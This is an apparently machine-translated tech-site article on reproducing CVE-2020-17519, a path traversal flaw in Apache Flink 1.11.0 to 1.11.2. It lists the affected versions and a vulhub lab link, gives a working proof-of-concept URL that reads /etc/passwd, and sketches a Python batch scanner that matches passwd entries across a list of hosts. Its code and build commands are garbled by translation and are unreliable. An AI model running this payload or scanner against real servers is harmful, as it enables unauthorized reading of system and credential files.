Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to reproduce the Apache Flink path traversal loophole CVE-2020-17519. Many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

Statement

Any direct or indirect consequences and losses caused by the dissemination or use of the information provided in this article shall be the responsibility of the user himself, and the author of the article shall not bear any responsibility for this.

Apache Flink is an efficient and distributed general data processing platform.

Apache Flink declarative open source data analysis system combines the high efficiency, flexible programming and expansibility of distributed MapReduce platform, and has powerful streaming and batch processing functions. At the same time, the query optimization scheme is found in the parallel database.

Required Unix class environment (Linux, Mac OS X, Cygwin) gitMaven (at least version 3.0.4) Java 6,7 or 8 (Note that Oracle's JDK 6 library will fail to build Flink, but is able to run a pre-compiled package without problem) git clone https://github.com/apache/incubator-flink.gitcd incubator-flinkmvn clean package-DskipTests # this will take up to 5 minutes

A change introduced in Apache Flink 1.11.0, including versions 1.11.1 and 1.11.2, allows an attacker to read any file on the JobManager local file system through the REST interface of the JobManager process.

According to official documents, it can only be run on UINX system.

Affect the version:

1.11.0

1.11.1

1.11.2

Docker address:

Https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

POC:

/ jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Python batch Test script:

Provide the following rules:

Pattern=re.compile (r "((root | bin | daemon | sys | sync | games | man | mail | www-data | uucp | backup | list | proxy | gnats | nobody" r "| syslog | mysql" r "| bind | ftp | sshd | postfix): [\ d\ w\-s,] +:\ d\ w\ -\ s,] *: [\ w\-_\ s,\ /] *: [\ w\-_\ s,\ /] *: "r"\ /] * [\ r\ n]) ") re_html=pattern.findall (html)

Create a new local host.txt

Put in the url carriage return division to be detected

Read line by line

After reading the above, do you have any further understanding of how to perform Apache Flink path traversal vulnerability CVE-2020-17519? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.